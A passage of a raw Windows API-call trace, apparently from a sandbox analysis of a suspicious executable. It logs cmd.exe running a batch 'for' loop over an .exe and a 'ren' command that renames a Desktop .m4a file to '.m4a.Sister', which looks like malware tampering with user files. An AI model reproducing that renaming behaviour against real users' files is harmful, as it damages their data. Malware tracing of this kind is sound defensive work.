??_V@YAXPEAX@Z () returned 0x1 [0151.762] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a81feb0, ftCreationTime.dwHighDateTime=0x1d5e999, ftLastAccessTime.dwLowDateTime=0x3ad49150, ftLastAccessTime.dwHighDateTime=0x1d5e64c, ftLastWriteTime.dwLowDateTime=0x3ad49150, ftLastWriteTime.dwHighDateTime=0x1d5e64c, nFileSizeHigh=0x0, nFileSizeLow=0x63c2, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="KoSrfJhDHVv1O_ 2.m4a", cAlternateFileName="")) returned 1 [0151.762] GetProcessHeap () returned 0x21ed8c70000 [0151.762] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63590, Size=0x2cc) returned 0x21ed8d63980 [0151.762] GetProcessHeap () returned 0x21ed8c70000 [0151.762] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63980) returned 0x2cc [0151.762] GetProcessHeap () returned 0x21ed8c70000 [0151.762] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9410710 [0151.763] GetProcessHeap () returned 0x21ed8c70000 [0151.763] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9410710, Size=0x30) returned 0x21ed9410710 [0151.763] GetProcessHeap () returned 0x21ed8c70000 [0151.763] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9410710) returned 0x30 [0151.763] GetProcessHeap () returned 0x21ed8c70000 [0151.767] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9410750 [0151.768] malloc (_Size=0x1ff9c) returned 0x21ed91ffd80 [0151.769] GetProcessHeap () returned 0x21ed8c70000 [0151.769] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bd00 [0151.769] ??_V@YAXPEAX@Z () returned 0x1 [0151.769] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9410750, Size=0x1c0) returned 0x21ed9410750 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9410750) returned 0x1c0 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9410920 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9410920, Size=0x290) returned 0x21ed9410920 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9410920) returned 0x290 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9410bc0 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9410bc0, Size=0x30) returned 0x21ed9410bc0 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9410bc0) returned 0x30 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9410c00 [0151.770] malloc (_Size=0x1ff9c) returned 0x21ed91ffd80 [0151.770] GetProcessHeap () returned 0x21ed8c70000 [0151.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7c070 [0151.771] ??_V@YAXPEAX@Z () returned 0x1 [0151.771] malloc (_Size=0x1ff9c) returned 0x21ed91ffd80 [0151.771] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43a50 [0151.771] FindClose (in: hFindFile=0x21ed8d43a50 | out: hFindFile=0x21ed8d43a50) returned 1 [0151.771] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d43a50 [0151.771] FindClose (in: hFindFile=0x21ed8d43a50 | out: hFindFile=0x21ed8d43a50) returned 1 [0151.772] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x84c96db6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x84c96db6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43a50 [0151.772] FindClose (in: hFindFile=0x21ed8d43a50 | out: hFindFile=0x21ed8d43a50) returned 1 [0151.772] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\KoSrfJhDHVv1O_ 2.m4a", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a81feb0, ftCreationTime.dwHighDateTime=0x1d5e999, ftLastAccessTime.dwLowDateTime=0x3ad49150, ftLastAccessTime.dwHighDateTime=0x1d5e64c, ftLastWriteTime.dwLowDateTime=0x3ad49150, ftLastWriteTime.dwHighDateTime=0x1d5e64c, nFileSizeHigh=0x0, nFileSizeLow=0x63c2, dwReserved0=0x4, dwReserved1=0x80, cFileName="KoSrfJhDHVv1O_ 2.m4a", cAlternateFileName="KOSRFJ~1.M4A")) returned 0x21ed8d43a50 [0151.772] FindClose (in: hFindFile=0x21ed8d43a50 | out: hFindFile=0x21ed8d43a50) returned 1 [0151.772] _wcsnicmp (_String1="KOSRFJ~1.M4A", _String2="KoSrfJhDHVv1O_ 2.m4a", _MaxCount=0x14) returned 22 [0151.772] malloc (_Size=0x1ff9c) returned 0x21ed921fd30 [0151.773] ??_V@YAXPEAX@Z () returned 0x21ed921fd30 [0151.774] GetProcessHeap () returned 0x21ed8c70000 [0151.774] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8790 [0151.774] ??_V@YAXPEAX@Z () returned 0x1 [0151.774] ??_V@YAXPEAX@Z () returned 0x1 [0151.774] GetProcessHeap () returned 0x21ed8c70000 [0151.775] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9410c00, Size=0x1c0) returned 0x21ed9410c00 [0151.775] GetProcessHeap () returned 0x21ed8c70000 [0151.775] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9410c00) returned 0x1c0 [0151.775] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0151.775] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.775] GetFileType (hFile=0x50) returned 0x2 [0151.775] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.775] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0151.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.800] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0151.857] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0151.859] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0151.924] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0151.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.926] GetFileType (hFile=0x50) returned 0x2 [0151.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.927] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0152.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.081] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0152.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.177] GetFileType (hFile=0x50) returned 0x2 [0152.177] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0152.178] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0152.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.352] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9410720*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9410720*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0152.439] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"KoSrfJhDHVv1O_ 2.m4a\" \"KoSrfJhDHVv1O_ 2.m4a.Sister\" ") returned 54 [0152.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.439] GetFileType (hFile=0x50) returned 0x2 [0152.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0152.439] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0152.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.538] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0152.614] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0152.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.614] GetFileType (hFile=0x50) returned 0x2 [0152.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0152.614] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0152.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.686] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0152.759] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0152.759] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.759] GetFileType (hFile=0x50) returned 0x2 [0152.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0152.759] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0152.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.832] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0152.919] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0152.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.919] GetFileType (hFile=0x50) returned 0x2 [0152.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0152.919] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0153.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.054] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0153.131] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0153.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.131] GetFileType (hFile=0x50) returned 0x2 [0153.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0153.131] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0153.203] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.203] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0153.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.285] GetFileType (hFile=0x50) returned 0x2 [0153.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0153.285] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0153.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.425] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9410bd0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9410bd0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0153.566] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.bat\" ") returned 54 [0153.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.566] GetFileType (hFile=0x50) returned 0x2 [0153.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0153.566] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0153.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.715] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0153.812] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0153.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.812] GetFileType (hFile=0x50) returned 0x2 [0153.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0153.812] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0153.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0153.973] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0154.132] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0154.144] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0154.144] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0154.145] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0154.145] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0154.145] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0154.145] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0154.145] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0154.145] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0154.145] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0154.145] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0154.145] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0154.145] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0154.145] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0154.145] ??_V@YAXPEAX@Z () returned 0x1 [0154.145] GetProcessHeap () returned 0x21ed8c70000 [0154.145] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d66c30 [0154.145] GetProcessHeap () returned 0x21ed8c70000 [0154.145] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66c30, Size=0x7c) returned 0x21ed8d66c30 [0154.145] GetProcessHeap () returned 0x21ed8c70000 [0154.145] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66c30) returned 0x7c [0154.145] GetProcessHeap () returned 0x21ed8c70000 [0154.145] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed8d67f40 [0154.146] GetProcessHeap () returned 0x21ed8c70000 [0154.146] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d63590 [0154.146] GetProcessHeap () returned 0x21ed8c70000 [0154.146] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63590, Size=0x7c) returned 0x21ed8d63590 [0154.146] GetProcessHeap () returned 0x21ed8c70000 [0154.146] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63590) returned 0x7c [0154.146] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0154.146] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0154.146] GetProcessHeap () returned 0x21ed8c70000 [0154.146] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43a50 [0154.146] GetProcessHeap () returned 0x21ed8c70000 [0154.146] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93757d0 [0154.146] _wcsicmp (_String1="KoSrfJhDHVv1O_ 2.m4a", _String2=".") returned 61 [0154.146] _wcsicmp (_String1="KoSrfJhDHVv1O_ 2.m4a", _String2="..") returned 61 [0154.146] GetFileAttributesW (lpFileName="KoSrfJhDHVv1O_ 2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kosrfjhdhvv1o_ 2.m4a")) returned 0x20 [0154.146] GetProcessHeap () returned 0x21ed8c70000 [0154.146] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9410dd0 [0154.147] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9410de0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0154.148] SetErrorMode (uMode=0x0) returned 0x0 [0154.148] SetErrorMode (uMode=0x1) returned 0x0 [0154.148] GetFullPathNameW (in: lpFileName="KoSrfJhDHVv1O_ 2.m4a", nBufferLength=0x7fe7, lpBuffer=0x21ed91ffd80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\KoSrfJhDHVv1O_ 2.m4a", lpFilePart=0xa6cf4fd660*="KoSrfJhDHVv1O_ 2.m4a") returned 0x2c [0154.148] SetErrorMode (uMode=0x0) returned 0x1 [0154.148] GetProcessHeap () returned 0x21ed8c70000 [0154.148] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373820 [0154.148] _wcsicmp (_String1="KoSrfJhDHVv1O_ 2.m4a", _String2=".") returned 61 [0154.148] _wcsicmp (_String1="KoSrfJhDHVv1O_ 2.m4a", _String2="..") returned 61 [0154.148] GetFileAttributesW (lpFileName="KoSrfJhDHVv1O_ 2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kosrfjhdhvv1o_ 2.m4a")) returned 0x20 [0154.148] ??_V@YAXPEAX@Z () returned 0x1 [0154.148] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0154.148] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0154.148] malloc (_Size=0xffce) returned 0x21ed920fd60 [0154.148] ??_V@YAXPEAX@Z () returned 0x21ed920fd60 [0154.148] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\KoSrfJhDHVv1O_ 2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kosrfjhdhvv1o_ 2.m4a")) returned 0x20 [0154.148] malloc (_Size=0xffce) returned 0x21ed921fd40 [0154.148] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0154.148] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\KoSrfJhDHVv1O_ 2.m4a", fInfoLevelId=0x1, lpFindFileData=0x21ed93757e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed93757e0) returned 0x21ed8d42c70 [0154.149] malloc (_Size=0xffce) returned 0x21ed922fd20 [0154.149] ??_V@YAXPEAX@Z () returned 0x21ed922fd20 [0154.149] ??_V@YAXPEAX@Z () returned 0x1 [0154.149] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\KoSrfJhDHVv1O_ 2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kosrfjhdhvv1o_ 2.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\KoSrfJhDHVv1O_ 2.m4a.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\kosrfjhdhvv1o_ 2.m4a.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0154.150] FindNextFileW (in: hFindFile=0x21ed8d42c70, lpFindFileData=0x21ed93757e0 | out: lpFindFileData=0x21ed93757e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a81feb0, ftCreationTime.dwHighDateTime=0x1d5e999, ftLastAccessTime.dwLowDateTime=0x3ad49150, ftLastAccessTime.dwHighDateTime=0x1d5e64c, ftLastWriteTime.dwLowDateTime=0x3ad49150, ftLastWriteTime.dwHighDateTime=0x1d5e64c, nFileSizeHigh=0x0, nFileSizeLow=0x63c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="KoSrfJhDHVv1O_ 2.m4a", cAlternateFileName="")) returned 0 [0154.152] GetLastError () returned 0x12 [0154.152] FindClose (in: hFindFile=0x21ed8d42c70 | out: hFindFile=0x21ed8d42c70) returned 1 [0154.152] ??_V@YAXPEAX@Z () returned 0x1 [0154.152] ??_V@YAXPEAX@Z () returned 0x1 [0154.154] ??_V@YAXPEAX@Z () returned 0x1 [0154.155] ??_V@YAXPEAX@Z () returned 0x1 [0154.155] GetProcessHeap () returned 0x21ed8c70000 [0154.155] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42c70 [0154.155] GetProcessHeap () returned 0x21ed8c70000 [0154.155] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95540, Size=0x16) returned 0x21ed8c95a60 [0154.155] GetProcessHeap () returned 0x21ed8c70000 [0154.155] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95a60) returned 0x16 [0154.155] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0154.156] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0154.156] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d63620 [0154.156] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63620, Size=0xb2) returned 0x21ed8d63620 [0154.156] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63620) returned 0xb2 [0154.156] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377f00 [0154.156] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377f00, Size=0x30) returned 0x21ed9377f00 [0154.156] GetProcessHeap () returned 0x21ed8c70000 [0154.156] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377f00) returned 0x30 [0154.157] GetProcessHeap () returned 0x21ed8c70000 [0154.157] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377f40 [0154.157] malloc (_Size=0x1ff9c) returned 0x21ed91ffd80 [0154.159] GetProcessHeap () returned 0x21ed8c70000 [0154.159] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d481d0 [0154.159] GetProcessHeap () returned 0x21ed8c70000 [0154.159] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d48410 [0154.159] ??_V@YAXPEAX@Z () returned 0x1 [0154.159] malloc (_Size=0x1ff9c) returned 0x21ed91ffd80 [0154.159] GetProcessHeap () returned 0x21ed8c70000 [0154.159] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d48590 [0154.159] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed91ffd80, lpFilePart=0xa6cf4fdd08 | out: 